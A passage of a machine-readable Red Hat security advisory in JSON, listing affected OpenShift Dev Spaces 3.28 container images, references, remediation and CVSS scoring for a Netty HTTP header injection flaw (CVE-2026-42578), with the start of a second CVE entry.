"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42578"
},
{
"category": "external",
"summary": "RHBZ#2477226",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477226"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42578",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42578"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr",
"url": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr"
}
],
"release_date": "2026-05-13T17:57:43.538000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T19:42:14+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25123"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-handler-proxy: Netty: HTTP Header Injection via HttpProxyHandler Disabled Validation"
},
{
"cve": "CVE-2026-42579",
"cwe": {
"id": "CWE-1286",
"name": "Improper Validation of Syntactic Correctness of Input"
},
"discovery_date": "2026-05-13T19:01:25.062732+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
